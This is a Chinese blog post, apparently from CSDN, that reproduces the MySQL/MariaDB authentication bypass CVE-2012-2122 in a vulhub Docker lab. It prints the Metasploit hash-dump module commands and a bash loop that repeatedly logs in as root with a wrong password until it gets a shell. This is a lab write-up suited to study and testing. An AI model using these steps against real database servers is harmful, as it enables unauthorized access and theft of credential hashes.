Mysql 身份认证绕过漏洞(CVE-2012-2122)复现

最新推荐文章于 2024-05-11 21:11:51 发布
最新推荐文章于 2024-05-11 21:11:51 发布
阅读量4.7k 收藏 5
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43606134/article/details/107928916
版权

漏洞详情
漏洞说明#
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库漏洞编号#
CVE-2012-2122
影响范围#所有的Mariadb和mysql版本:5.1.61、5.0.11、5.3.5、5.5.22

实验环境
攻击机:kali 2020.2
靶机:CentOS Linux 7
项目地址:
https://github.com/vulhub/vulhub

基础环境搭建
查看我以前的博客自行搭建

实验环境搭建
项目地址

https://github.com/vulhub/vulhub

下载后上传至任意目录,进入目录

vulhub-master/mysql/CVE-2012-2122

启动docker编译

docker-compose up -d

至此实验环境搭建成功,查看对应的端口
在这里插入图片描述
复现步骤
我们用nmap扫描一下mysql的版本为5.5.23
在这里插入图片描述
这里我们采用msfconsole中的模块进行漏洞验证

service postgresql start  启动msf数据库
msfconsole  进入msf
use auxiliary/scanner/mysql/mysql_authbypass_hashdump  选择该模块
set rhosts 14.104.1.1  设置目标
set threads 10  设置线程
run

在这里插入图片描述
然后解hash就行,解出来登陆
在这里插入图片描述
发现密码是“133456”

mysql -u root -P 3306 -h 192.168.247.129 -p

在这里插入图片描述
漏洞复现方法二
采用shell脚本:(直接返回mysql的shell)

for i in `seq 1 1000`; do mysql -u root --password=bad -h 192.168.247.129 2>/dev/null; done

在这里插入图片描述
复现成功!

m__ing
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
Mysql 身份认证绕过漏洞CVE-2012-2122)
lonmar的博客
07-24 2661
参考连接: https://www.freebuf.com/vuls/3815.html 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。而且漏洞利用工具已经出 受影响版本: MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 ar
Mysql 身份认证绕过CVE-2012-2122)
bqnagus
10-02 725
Mysql 身份认证绕过CVE-2012-2122)
MySql身份认证绕过漏洞(CVE-2012-2122)
dgjkkhcf的博客
07-24 4643
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。.........
MySQL 身份认证漏洞 CVE-2012-2122
最新发布
MateSnake的博客
05-11 358
MySQL 身份认证漏洞 CVE-2012-2122
mysql身份认证绕过漏洞CVE-2012-2122)
weixin_53730939的博客
03-12 1241
mysql身份认证绕过漏洞CVE-2012-2122)
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC
09-04
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, ...
Apache Shiro身份验证绕过漏洞(CVE-2020-13933)
07-17
直接使用java -jar srping....war命令运行即可 执行之后,访问http://主机的IP:8888/admin/*或者http://主机的IP:8888/login
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
02-09
【该漏洞通过版本比较方式检测,结果可能不准确,需要根据实际情况确认。】Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 "IP and domain restrictions" ...
Mysql身份认证漏洞及利用(CVE-2012-2122)
qq_50854662的博客
03-01 2480
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。而且漏洞利用工具已经出。 受影响的产品: All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable. MariaDB version
数据库安全:MySQL 身份认证漏洞CVE-2012-2122)
网络安全领域___专研者.
11-10 709
MySQL 身份认证漏洞是一个身份认证绕过漏洞,该漏洞的核心原理涉及到 MySQL 在处理身份认证时的一个安全缺陷,这个漏洞可以使攻击者可以绕过安全身份认证,从而达到未经授权的方式进行访问 MySQL 数据库。
Vulhubmysql身份认证绕过漏洞CVE-2012-2122)
qq_63101755的博客
07-18 136
Vulhubmysql身份认证绕过漏洞CVE-2012-2122)
漏洞CVE 2012-2122——Mysql身份验证绕过
人若有志,就不会在半坡停止。
08-25 983
漏洞CVE 2012-2122——Mysql身份验证绕过
CVE2012-2122漏洞 ,用两种攻击方式
weixin_64655821的博客
08-26 935
CVE2012-2122漏洞 ,用两种攻击方式 mysql 备份上传木马,并用shell工具连接操作
NTP 身份验证绕过漏洞(CVE-2015-7871)
05-09
CVE-2015-7871是NTP中的一个身份验证绕过漏洞,攻击者可以利用该漏洞来实远程攻击并控制目标机器。 该漏洞的原因是NTP在处理某些特殊的数据包时会发生缓冲区溢出,导致攻击者可以通过发送精心构造的数据包来触发...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值